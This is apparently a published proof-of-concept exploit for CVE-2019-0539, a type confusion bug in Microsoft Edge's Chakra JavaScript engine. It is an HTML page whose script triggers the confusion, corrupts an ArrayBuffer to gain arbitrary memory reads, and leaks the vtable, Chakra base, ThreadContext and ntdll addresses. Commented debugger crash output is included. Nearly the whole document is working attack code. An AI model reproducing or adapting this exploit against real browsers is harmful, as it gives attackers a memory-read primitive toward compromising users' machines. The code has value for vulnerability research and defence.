Microsoft Edge Chakra 1.11.4 Type Confusion

`<html>  
<script>  
  
/*  
# Exploit Title: [getting Read permission through Type Confusion]  
# Date: [date]  
# Exploit Author: [Fahad Aid Alharbi]  
# Vendor Homepage: [https://www.microsoft.com/en-us/]  
# Version: [Chakra 1_11_4] (REQUIRED)  
# Tested on: [Windows 10]  
# CVE : [cve-2019-0539]  
*/  
/* author @0x4142 => Fahad Aid Alharbi   
* cve-2019-0539  
* Getting Read &_^  
* date 27 Feb , 2019   
  
*/  
  
var convert = new ArrayBuffer(0x100);  
var u32 = new Uint32Array(convert);  
var f64 = new Float64Array(convert);  
  
var BASE = 0x100000000;  
  
function hex(x) {  
return `0x${x.toString(16)}`  
}  
  
function bytes_to_u64(bytes) {  
return (bytes[0]+bytes[1]*0x100+bytes[2]*0x10000+bytes[3]*0x1000000  
+bytes[4]*0x100000000+bytes[5]*0x10000000000);  
}  
  
function i2f(x) {  
u32[0] = x % BASE;  
  
u32[1] = (x - (x % BASE)) / BASE;  
  
  
  
return f64[0];  
}  
  
  
function f2i(x) {  
f64[0] = x;  
return u32[0] + BASE * u32[1];  
}  
  
  
obj = {}  
obj.a = 0x41;  
obj.b = 0x42;  
obj.c = 0x41;  
obj.d = 0x42;  
obj.e = 0x40;  
obj.f = 0x40;  
obj.g = 0x90;  
obj.h = 0x90;   
obj.i = 0x90;  
  
t = new ArrayBuffer(0x200);  
newL = 0x1000;  
  
hax = new ArrayBuffer(0x2000);  
read_me = 0;  
  
  
function hit_to_read(t){  
  
obj.h = hax; // set ta->buffer to hax  
obj.i = newL; // update target's length  
read_me = new Float64Array(t);  
  
return read_me;  
  
}  
  
function read(r,read_me)  
{  
  
  
  
read_me[7] = i2f(r); // setup hax->buffer  
//hax = new ArrayBuffer(0x1000);  
return hex(f2i(read_me[7]))   
  
}  
  
  
  
function cout(f){return document.write(f);}  
function opt(o, c, value) {  
o.c = 1  
//o.a = "HELLO"  
// o.b = 3;  
//o.e = 1  
class A extends c {  
  
}  
  
o.a = value // will overwrite rcx , rdx , rax  
//o.b = value => chakra!Js::RecyclableObject::HasOnlyWritableDataProperties+0xe:  
//o.b = 0x42424242  
o.c = 555555  
// o.d = 4  
  
}  
  
  
function pwn() {  
  
for (let i = 0; i < 0x1000; i++) {  
let o = {a: 1, b: 2,c:3};  
opt(o, (function () {}), {});  
}  
  
let o = {a: 2222, b: 2,c:4,d:5};  
let cons = function () {};  
  
cons.prototype = o;  
/* line 120   
auxSlots *p   
__Vfptr | type | 0x00000001234 | 0x0  
*/  
  
opt(o, cons, obj);  
  
  
o.f = t  
  
read_me = hit_to_read(t);  
  
cout("[+] vtable pointer is " + hex(f2i(read_me[0])));  
vtable = hex(f2i(read_me[0]));  
  
buffer_addr = f2i(read_me[7]);  
  
Chakrabase = hex(vtable - 0x59a3c0)  
  
cout("<br>")  
cout("[+] ChakraBase : " + Chakrabase)  
  
  
cout("<br>buffer_addr: " + read(buffer_addr + 40 , read_me))  
  
ThreadContext = read(Chakrabase - 0xffec5448,read_me)  
Ntdll = read(Chakrabase - 0xdd9a0000,read_me)  
cout("<br>")  
cout("[+] ThreadContext : " + ThreadContext)  
cout("<br>")  
cout("[+] Ntdl : " + Ntdll)  
  
  
}  
  
pwn();  
  
  
/*  
  
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:  
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????  
  
  
  
  
  
*/  
  
/*  
  
s=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246  
chakra!Js::SimpleDictionaryTypeHandlerBase<unsigned short,Js::PropertyRecord const * __ptr64,0>::GetPropertyFromDescriptor<0>+0x59:  
00007ffc`d61f4109 4c8b14c8 mov r10,qword ptr [rax+rcx*8] ds:00010000`41414141=????????????????  
  
  
  
  
  
*/  
</script></html>  
`